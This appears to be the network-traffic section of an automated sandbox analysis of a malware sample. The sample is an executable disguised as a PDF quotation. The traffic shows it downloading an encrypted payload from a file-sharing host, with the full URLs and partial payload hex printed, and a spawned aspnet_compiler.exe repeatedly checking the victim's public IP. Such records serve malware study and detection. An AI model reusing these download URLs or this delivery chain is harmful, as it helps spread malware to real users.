Oct 4, 2024 11:24:21.336754084 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 32cc1489714a08db41e6a046e7110a58 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 4, 2024 11:24:22.046673059 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 4, 2024 11:24:22.200370073 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a9e00a8e0948e03d23a0a63c43251c1a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49716	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:22.836973906 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 4, 2024 11:24:23.416774988 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8720315dbb72f27de87aca086f44ec44 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49718	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:24.022149086 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:24.586107969 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9de9034bd25746ad6e1b4533107e70b1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49720	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:25.205605984 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:26.013389111 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d79c24bad166b3fad46ab647c8d9b7c5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49722	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:26.647919893 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:27.210319996 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8723b7a0c99fcd5d208de40f96fac979 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49724	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:27.822127104 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:28.410779953 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e40ad4d3ae496ec4eb0ce76c19afeee6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49726	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:29.006099939 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:29.577189922 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ea5a2b5787c0a6f56d8f14012b096685 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49708	188.114.97.3	443	7264	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:23:27 UTC	95	OUT	GET /data-package/MlZtCPkK/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-10-04 09:23:28 UTC	1066	IN	HTTP/1.1 302 Found Date: Fri, 04 Oct 2024 09:23:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=hducadlb9k3ubm7rgrksg0t4pv; expires=Fri, 18-Oct-2024 09:23:28 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s20.filetransfer.io/storage/download/LuTcDMs7R8e5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NouWJmhJ5J7nMgZmY7fhXGH23jLHwtMmT4mOBYITpHUfKLW0%2FES171C3qzSHczN%2B9Gyi8AglLGdUXr9PzOe%2FNJHd2BABlpw4yFi0KJFd0aAilprouqR73JryPepMlJeItyI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cd41d041af20caa-EWR
2024-10-04 09:23:28 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 30 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 4c 75 54 63 44 4d 73 37 52 38 65 35 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a Data Ascii: 80<h1>Redirect</h1><p><a href="https://s20.filetransfer.io/storage/download/LuTcDMs7R8e5">Please click here to continue</a>.</p>
2024-10-04 09:23:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49709	188.114.96.3	443	7264	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:23:29 UTC	98	OUT	GET /storage/download/LuTcDMs7R8e5 HTTP/1.1 Host: s20.filetransfer.io Connection: Keep-Alive
2024-10-04 09:23:30 UTC	1025	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:23:30 GMT Content-Type: application/octet-stream Content-Length: 1021448 Connection: close Last-Modified: Fri, 04 Oct 2024 05:33:39 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=e7f5c470921bd20881ad752d4890fd08; expires=Fri, 18-Oct-2024 09:23:29 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Qknaammmi.dat" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "66ff7e33-f9608" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zhj0VhH5YMQZZyHXD3Hb3Aun5ZwuxWuLHaDpGgVjGC7YEMJUUNBsIctc4JHf1pmpIDGbO9XzESNqqOfTNYIcNIsG1oj3mKlEOdefnSU65xh%2BfJMIN9SfXVe7JvzaqBWE2RGohf%2F%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41d0ccd960f9f-EWR
2024-10-04 09:23:30 UTC	344	IN	Data Raw: c6 0b eb 1b 1f 5d 2c ae a4 41 c7 a2 fb 29 22 e4 6a 4f 6d 83 4d f2 6c 23 59 ba 9a 00 55 66 cd 16 4c 9a 21 2c 70 1a e9 57 ef 84 7f e9 de e8 41 ec f6 e3 b4 14 58 0d 67 1b 1b e7 12 4c aa 35 d0 a4 17 70 a6 fb 90 77 8e 7f 20 23 f0 be bd 8e 97 35 29 cd 27 1f 52 ce f4 6a 03 16 a1 65 2d 45 20 a7 9f fa f5 80 42 8b 7b ed 47 a9 40 54 72 08 2f 0b f8 89 0e 10 8e 2c 83 71 0c f6 09 3e ed 99 92 1c 62 e1 aa a8 ce c2 f0 43 05 36 40 e2 ed 13 a0 53 f4 d6 b8 62 63 88 25 5d 8c 13 01 98 fe 73 4a 2b e2 ab b0 6b 16 9a ca 61 9e 8f bd 4b 92 c4 28 12 0f 4d dd b0 ba 95 42 bc 9a 7a 28 a8 29 3d e9 1b eb eb f6 98 1d 59 01 84 2a 24 e5 7b d9 c3 75 65 3b d5 03 61 c2 ab 93 c4 f0 3b 34 fc 11 bc a9 53 e5 59 65 f7 e1 bc 14 4a e3 6b 23 3f 33 68 18 d6 91 34 1b 54 be 14 49 67 b8 c8 32 e5 2b 37 c4 Data Ascii: ],A)"jOmMl#YUfL!,pWAXgL5pw #5)'Rje-E B{G@Tr/,q>bC6@Sbc%]sJ+kaK(MBz()=Y*${ue;a;4SYeJk#?3h4TIg2+7
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: 5d 09 83 c2 f7 9f 52 cb 37 4c 26 8d 52 cd 38 cc 98 06 84 90 36 bc a0 e7 3e cb 5b 95 55 24 0e 18 b8 26 6b 8f 6b 26 4c 7d 75 e4 18 87 93 53 0b 8b bf 92 33 02 b5 87 e8 44 96 18 5a 16 78 07 d4 73 57 fb 52 44 60 5b 11 dc 47 0c 6c b3 03 b0 45 38 83 dd f4 da 4b a5 d5 6a f8 79 1b c1 eb 8d c5 3b d1 15 e7 28 24 9b a7 3d 07 e5 b7 b8 4d 23 d2 07 8c 9f 5a c0 19 29 1f bd fe 0f 04 cc 17 89 ee 72 8e 72 39 29 08 bb a4 a1 17 2c 5b 4d dd be 14 30 c7 c3 30 6e df 8f 2d 9e 5c 15 d7 c8 78 eb d8 bd 42 88 db a4 7b f7 1c b2 82 1e c7 da 00 66 bb 71 1b 86 c1 54 3e 34 d6 f3 46 45 bd f1 f0 70 88 a6 0b 47 0a 7d dc 02 6e f6 bd ea 76 e2 e1 44 61 9d a4 fa af 83 1f 28 06 a0 a5 27 b0 ab 97 58 c7 47 be 31 9c a9 f5 65 bf a0 a5 7f 3f 16 37 8e 16 d8 f5 aa a1 7f 4f 2d 69 9a 1a e6 e2 fa 9e 3b ef Data Ascii: ]R7L&R86>[U$&kk&L}uS3DZxsWRD`[GlE8Kjy;($=M#Z)rr9),[M00n-\xB{fqT>4FEpG}nvDa('XG1e?7O-i;
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: a3 ee 2d 2a 6a 54 bc bc 1e be b3 4c dc 3c 52 62 d5 55 71 33 1a 40 d8 10 dd 56 bb 9c ca 9d 7c 1c dc 05 d8 c8 19 3b 6d 00 66 96 20 1d 74 91 0f b4 36 ae 71 37 f1 8b 15 07 47 72 11 26 d1 4e 5d e5 4b d5 0f 34 a6 f4 c5 0c 63 53 cf a9 2d 95 54 a7 20 92 a2 c8 04 b9 2a 23 89 77 12 7e 7b 97 84 cd a3 0d 60 ca dc 42 eb 10 b8 8f 76 9d 8b b0 9c 02 3b 74 fd d8 63 c0 07 ae 2e a1 6e 6c d8 f8 74 e9 b6 8d 01 73 94 fb 58 31 e6 24 59 94 0e 63 a7 d4 00 3a a6 8c 12 85 f0 33 e0 8d 79 40 e3 71 d7 01 1b af 13 55 2c ac 01 45 58 2c 22 34 09 92 ad c1 48 ec 74 6c 81 5d e7 98 9f 8c 2f 4a a2 e4 ce d5 40 e8 6b 8e 84 77 15 40 c9 7e 98 1d 4c 7c a6 26 08 a6 55 f4 95 c4 af cd 72 52 3c 27 2e 7a d2 92 10 dd f5 9a 30 a1 a1 ac 57 cf 16 41 81 30 b5 53 3f 1d 65 48 a1 86 7c 68 26 bd 62 9f f4 25 6b Data Ascii: -jTL<RbUq3@V\|;mf t6q7Gr&N]K4cS-T #w~{`Bv;tc.nltsX1$Yc:3y@qU,EX,"4Htl]/J@kw@~L\|&UrR<'.z0WA0S?eH\|h&b%k
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: 71 3c f9 97 75 cf 3c 10 c0 e1 d6 03 b8 67 45 15 f5 01 b5 6f 13 9f cd 75 d3 ec d7 91 8e 95 1a 92 22 80 8b 7c 18 36 5c cb cf c6 32 b6 f3 38 0b b6 b0 c4 28 7d b8 db e9 1e 17 06 ab ed aa 3b d5 9f f5 da 26 9c 69 42 71 de cb 04 cb b3 83 4a 86 a0 da 9b 6e 15 0c dd 1e e2 ba 4b d7 0e d0 fd a8 91 92 65 67 96 41 98 1a 5c b0 6d 6e 75 06 06 9e 49 bd f1 50 90 e7 67 60 c3 cb 96 ba b0 58 ac a1 cf 76 a8 9f c9 06 71 32 60 19 6d c7 57 36 db 98 64 d5 8f b2 6e 1f 61 47 4a c9 67 7f 9c 5e 80 33 5c 8f 1d e9 34 54 45 20 81 3d a2 42 11 17 d4 89 a4 5a 47 20 7d 98 7d 75 a4 e5 8a e9 85 d8 73 f4 4d 40 a0 32 44 8e ec d7 25 e4 93 e2 db fe 67 83 17 69 6a 93 2b 57 f5 68 24 89 95 c6 27 98 4b 22 4b 57 7b b9 90 7c 7b 5c c6 82 84 9d ea c3 25 61 78 39 10 cb 03 df c8 94 e2 67 92 ef d6 68 1a 4d Data Ascii: q<u<gEou"\|6\28(};&iBqJnKegA\mnuIPg`Xvq2`mW6dnaGJg^3\4TE =BZG }}usM@2D%gij+Wh$'K"KW{\|{\%ax9ghM
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: 7c a0 bd 77 e4 42 b5 1c 5b 0a b8 3c ad 0a eb 17 3a 04 8a 72 ba 71 93 55 a2 b8 63 a5 5a 0c b0 41 b0 79 cf d6 43 96 9d c3 b6 8c 4a c2 03 07 8d 09 1c be f5 c9 4e ff 85 ae df ef 63 e1 54 b6 9f 31 bf 8c 63 35 61 bb a4 fe 03 33 46 69 e2 41 91 65 ca 51 8a 9d d9 32 5d 3a f7 c2 c4 43 22 f3 44 4a a1 5f 58 54 1d ff c9 4d 78 67 36 31 33 4d ec e8 e3 88 ba 00 f8 09 86 45 c6 8b 29 71 a7 24 37 e9 2b f4 13 55 ae 5c 13 9f 21 84 ea 4a 36 74 9c af 7e 41 71 df 24 b1 54 6b 1a fb 76 b2 aa e5 c1 16 d5 5a 56 8f a4 53 49 49 96 ab fb bd 12 3e a7 33 54 1b ff 5f 20 c3 14 a0 d2 c7 24 21 16 95 c1 1b 25 ee 2a 88 18 d3 4c 72 73 cc 54 65 e0 bc c3 6d 16 e1 53 ab b8 e6 4d d5 d7 71 f6 59 1f 3b dd 9a fc 09 14 60 f2 7f 20 ca 30 e9 1e 0f 38 43 54 df ce be b4 69 32 e7 7d b4 de 32 84 e7 4e c2 0e Data Ascii: \|wB[<:rqUcZAyCJNcT1c5a3FiAeQ2]:C"DJ_XTMxg613ME)q$7+U\!J6t~Aq$TkvZVSII>3T_ $!%*LrsTemSMqY;` 08CTi2}2N
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: f9 c0 5e 76 2b 87 2c 1f 6b 47 9d 3d f9 44 36 5c 78 67 91 81 70 1a 4d 34 3d a2 6a 8a 4d c4 ac 21 fd 65 77 21 a4 02 16 0c 8e cc f6 86 88 26 e3 da 91 e7 6a 85 f9 42 15 b8 af 81 51 ff 1a e0 79 f4 d9 3c 02 e1 12 2f d0 60 8e c0 22 97 08 a2 5b 83 de 9e 4d b9 4d f4 29 f8 d5 b9 47 3b 2e 77 45 47 ff 80 25 32 43 de 79 49 92 91 56 79 56 5e 27 ab cf f4 e8 b4 dc c7 d4 e6 1b 8f fa 3d 47 71 0c f1 84 1d 71 99 0e d2 6a 11 78 1f c9 cb d0 14 43 8d 1f f0 9e 8d 3f e7 39 f4 9d 91 1c df bf 83 c6 77 40 2a ff 4b d3 a6 97 dd a7 65 81 ec 62 e9 71 af e7 4c 26 ab 89 03 fd 54 24 b9 60 f3 20 8c 22 cd 10 c5 78 c7 93 fc 20 f5 38 26 07 17 0a e3 38 bd e2 42 b3 44 ac d9 7a aa b6 db e7 92 e8 1d 9a 31 a9 24 8d 41 49 c4 4b 6b 73 f7 41 70 34 39 92 0f 6d b5 59 07 23 fc 2c 78 0a 56 2c 97 90 27 2c Data Ascii: ^v+,kG=D6\xgpM4=jM!ew!&jBQy</`"[MM)G;.wEG%2CyIVyV^'=GqqjxC?9w@*KebqL&T$` "x 8&8BDz1$AIKksAp49mY#,xV,',
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: f1 0a d6 9c 05 f8 46 fa bc 0e cf 0f d6 08 60 e9 1d b8 98 bc 2c e6 43 a8 0c ea 8e be 04 fe 1f f6 e7 c2 5a 24 00 30 7a d3 44 0a bb 70 dc 15 00 ea d1 c8 7c b1 b2 95 b6 03 e3 fa dd 66 e6 62 c8 cb 0e a3 d0 a3 51 08 76 a8 93 5e 8a 91 24 91 b5 13 66 1b cc 4f a0 e2 aa 12 1f c0 57 03 46 43 5c fd 91 c0 9d fd de 22 d1 72 86 f1 c4 26 88 d8 69 a2 f3 b4 e7 1d 2d 4c 7f c2 53 51 13 e9 82 c0 13 76 b0 5f 21 b2 28 0e 0c ef 42 60 5e f2 69 86 37 42 e6 da dc d8 03 62 59 4f 69 49 63 80 5a a8 2d 10 89 e6 40 66 7e 7a c1 10 97 92 d8 08 a6 14 0b 4e 1c f2 0e de db d6 6b 23 8b 0a f5 ca 08 52 47 13 dc ac eb e5 b0 b9 fc 98 f7 bd e5 f7 5b 8d 5b 0c 5d a0 44 88 25 9d ce 6b a8 31 43 07 8f 20 11 31 29 3f 81 bd 57 a6 30 7c 78 65 94 55 7d f9 16 1b 4d 2b 2d 19 5f 79 47 67 46 25 7d c9 60 b4 fc Data Ascii: F`,CZ$0zDp\|fbQv^$fOWFC\"r&i-LSQv_!(B`^i7BbYOiIcZ-@f~zNk#RG[[]D%k1C 1)?W0\|xeU}M+-_yGgF%}`
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: 33 aa c2 15 c9 5d 28 4f 08 37 e2 95 d7 cc 16 0b 7e 37 e2 ea b3 e2 14 4f 0c a2 c6 29 d2 43 19 ad db 22 c3 b1 22 fc fa 7c ed 35 f9 24 5b 4c 9e 3f 40 1e 0e 92 05 30 af a1 f5 f8 16 15 93 f0 61 22 59 c9 fd f9 89 06 bc 2f c9 dd b1 fc 97 01 38 2f 4d 61 e4 ad b6 53 68 c5 a3 73 b8 7d 7e 3f 22 54 f4 18 30 a7 88 d6 91 07 ae da 99 ff b2 fa 04 4c 54 4c 30 11 e5 2a a8 0d c4 19 55 91 ae 85 23 d0 7b 84 ce 2f 14 6b a7 b4 bc 83 c2 4c 51 4e 35 e7 ef 87 d6 55 ae 60 18 90 d6 13 4c dc 6c 1a 64 71 17 b1 f3 93 d2 36 cc 0a 17 76 23 42 eb c5 62 39 b9 15 e5 83 7d 36 a8 8d 64 d2 a7 5f e5 ab 40 c2 24 48 0b a7 54 2a 93 03 dc b0 6c fe 59 b8 c4 23 78 ed 48 66 5f fd 32 da d0 20 1a e7 5f 98 c7 51 dd 90 2d 95 e3 fe 79 08 a9 50 ea a6 aa 97 45 4b de 72 92 41 86 03 64 ff 87 09 4f 10 c1 26 21 Data Ascii: 3](O7~7O)C""\|5$[L?@0a"Y/8/MaShs}~?"T0LTL0U#{/kLQN5U`Lldq6v#Bb9}6d_@$HTlY#xHf_2 _Q-yPEKrAdO&!
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: a7 45 6c 28 5d a3 d4 aa 29 b1 1a 4f 6a 2c 76 e0 fb 74 d5 36 20 6a 3e 40 51 2b 75 ba cb b5 93 66 9a 0d ac e9 aa 1f 93 f7 c1 e5 59 2b 63 a7 31 d1 b9 de 93 25 ed 79 a6 30 c9 ae 5f 98 30 bd 22 99 8c 9e e2 5d 21 b1 50 50 80 cd a9 d3 55 ef a2 26 c9 0a 9f 6c 74 37 df f4 ca 71 c2 72 a0 64 64 fc ab b9 c1 1c 9e dc 93 4b db 4c 33 61 5e cd 32 24 c6 49 4a a9 70 da 74 90 3c 6f 56 3a 21 d6 e1 cb c3 10 57 0f b8 9b 7e 8a 02 8c 6a 92 1b 39 78 ea 80 08 0f 7c c7 ff f1 a3 77 46 ee 94 97 79 b7 ca ef 8f 69 81 85 fd ed c7 38 25 e4 72 10 87 0e 04 44 c5 9a a6 00 98 ed c0 5c b6 32 e4 e7 66 a6 07 82 d4 fe dd e2 f5 e9 10 94 ed cd b4 0e 3e 2d 67 56 26 12 eb 19 46 2a b2 96 ce b0 2b c6 5c 03 18 c9 91 4b e3 70 f9 bd a4 bd 15 bf af b3 8a b0 3d 22 8b 23 7f 22 44 55 87 fa a3 71 49 26 a8 83 Data Ascii: El(])Oj,vt6 j>@Q+ufY+c1%y0_0"]!PPU&lt7qrddKL3a^2$IJpt<oV:!W~j9x\|wFyi8%rD\2f>-gV&F*+\Kp="#"DUqI&
2024-10-04 09:23:30 UTC	1369	IN	Data Raw: 1c e4 98 8c 61 68 cb 66 56 ba d3 6b 20 c4 a4 1f 31 d2 8e a4 6f df 8f 32 0a fb 53 2c 3d d9 d2 7e 90 cb 90 b5 72 23 82 39 6a da 63 d9 d1 5c cd f3 ef 48 8f 7b 1f f4 af 49 d0 a3 bd ed 9a 40 81 02 2c 37 f3 13 da 2f ac 8a 5e ba 3d 16 b2 e4 29 66 06 30 ba d1 f2 b3 92 7f 16 2b 24 d8 9b e8 9e 5f e6 fc ad 68 f8 8b 85 0f 4c 77 47 be 6a b3 09 64 4f 30 99 4e fa d1 4a 09 72 e7 0c 73 53 4c a7 a9 c3 fe c8 dd 50 fd 70 3e 12 69 97 b2 10 4e 7a 3d f8 3b 0f dd fc 64 35 6f 1e e9 53 e2 65 28 da f1 b5 67 bc 3c df 8e 17 3c 98 65 a2 12 b3 30 3e 61 97 fc 87 dc 2a 04 55 3d 73 19 e5 ed 10 40 66 58 cb e3 df 87 48 fe a6 69 e8 29 eb 91 86 b5 49 c6 dc 48 5d 4f 38 1d 84 70 30 72 23 48 ae 74 f9 bb f1 36 a1 ff bb f9 d7 e5 40 41 5e 80 13 97 2c 84 98 9b 65 67 8a 58 6d f5 87 ee ca 78 da f4 5a Data Ascii: ahfVk 1o2S,=~r#9jc\H{I@,7/^=)f0+$_hLwGjdO0NJrsSLPp>iNz=;d5oSe(g<<e0>a*U=s@fXHi)IH]O8p0r#Ht6@A^,egXmxZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49714	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
